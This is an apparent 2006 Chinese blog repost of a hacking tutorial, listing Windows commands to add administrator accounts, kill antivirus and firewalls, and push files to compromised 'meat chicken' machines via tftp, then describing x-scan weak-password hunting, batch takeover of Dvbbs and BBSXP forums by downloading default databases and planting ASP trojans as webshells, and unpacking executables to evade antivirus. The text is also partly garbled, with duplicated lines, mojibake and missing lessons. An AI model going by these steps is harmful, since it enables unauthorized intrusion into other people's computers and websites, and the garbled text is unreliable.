电脑黑客基本技术和入侵的关键字以及电脑攻防应用

本文摘抄自http://www.cnitblog.com/zhangyafei/

第一课: 入侵必备DOS命令总结

一.对用户操做

net user --------查看有哪些用户

net user guest /active:yes ------ 激活guest用户

net user 用户名 密码 /add ------建立用户

net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限

二.必备命令

net start -----查看开启了哪些服务

net start 服务名-----开启服务

net stop 服务名------停止某服务

netstat -an :查看端口的网络连接情况

ipconfig :查看本地ip地址

三.关防火墙,杀毒软件命令

net stop sharedaccess ----关系统自带防火墙

pskill.exe ravmon -----杀掉瑞星软件

pskill.exe pfw ----关天网防火墙

net stop "Symantec AntiVirus"----关于诺顿企业版

net stop KAVStart------关闭金山杀毒

向肉鸡上传文件命令:

第一种方法:tftp

命令格式:tftp -i 你的公网IP get xx.exe

:计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音罖@刂瞥绦?br>sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介(安装完成后出现的漫游xp程序)
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具,系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

第二课:x-scan扫描器的使用技巧详解

一.详解x-scan的配置:

1.扫描模块设置:

1).开放服务

(2).远程控制系统

(3).nt-server弱口令-----administrator 空口令或弱口令.

(4).sql-server弱口令 ---sa 空口令或弱口令.

2.扫描IP范围设置:

(1).指定IP范围.

(2).从文件中导入IP列表.

二.x-scan在入侵中的应用:

1.对系统的综合安全检测,有针对性的入侵.

2.找肉鸡

nt-server弱口令

sql-server弱口令

3.邮箱,ftp,vnc的破解

三.x-scan入侵实例演示部分:

1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC)

2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器)

s扫描-----扫开放1433的机子

x-scan扫描-----对开放1433的机子进行弱口令探测.

第五课:网站猎手批量入侵实战演示

黑天

一.二个重点要素:

1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高.

选择技巧:一般选择论坛最低部的版权信息或程序名称.

2.检测的页面或文件: 也就是程序存在漏洞的地方

二.网站猎手批量入侵实战演示篇:

1.实战演示一:

检测的页面或文件: data/dvbbs7.mdb

关键字:Powered By :Dvbbs Version 7.0.0

由默认数据库到拿网站webshell过程:

第一步:下载动网默认数据库

第二步:在数据库中找管理员密码

技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码.

第三步:在前台以jpg格式上传asp木马.

第四步:用备份数据库功能把jpg格式备份成我们的ASP木马.

2.演示二:

检测的页面或文件:database/bbsxp.mdb

关键字:Powered by BBSXP 7.00

3.演示三:

检测的页面或文件:upfile_flash.asp

关键字:商城

四:关于批量得webshell的其它思路

1.思路一:

到大型源码下载中心,把下载量较大的源程序,下载回来研究.

主要研究他们的默认数据库地址,默认管理账号和密码,默认后台.

然后用关键字结合网站猎手批量检测.很快就提到大量webshell

2.思路二:社会工程学批量入侵拿webshell

1.免杀

 

2.破解

 

3.程序汉化,个性修改.

 

二.脱壳四步骤:

第一步:查壳

常用查壳工具: PEID ,FI ,PE-SCAN 等.

第二步:找OEP

工具:ollydbg

第三步:脱壳

常用脱壳工具:

1.OD自带的脱壳插件:右键脱壳之.

2.LordPE:选择所调试进程右键,完整脱壳.

第四步:修复

Import REConstructor 1.6

三.在ollydbg脱壳中常用快捷键介绍

F2: 下断点.

F4:运行到所选择的那一行.-----遇到向上跳时用到

F7:单步进入----遇到近call时用到.

F8:单步跟踪

F9:运行程序

Shift+F9 :忽略异常运行

Alt+M:打开内存镜像

什么时候用,用哪个?以后会在具体实践操作中具体讲

posted @ 2006-12-25 17:26  洪虎  阅读(1191)  评论(1编辑  收藏  举报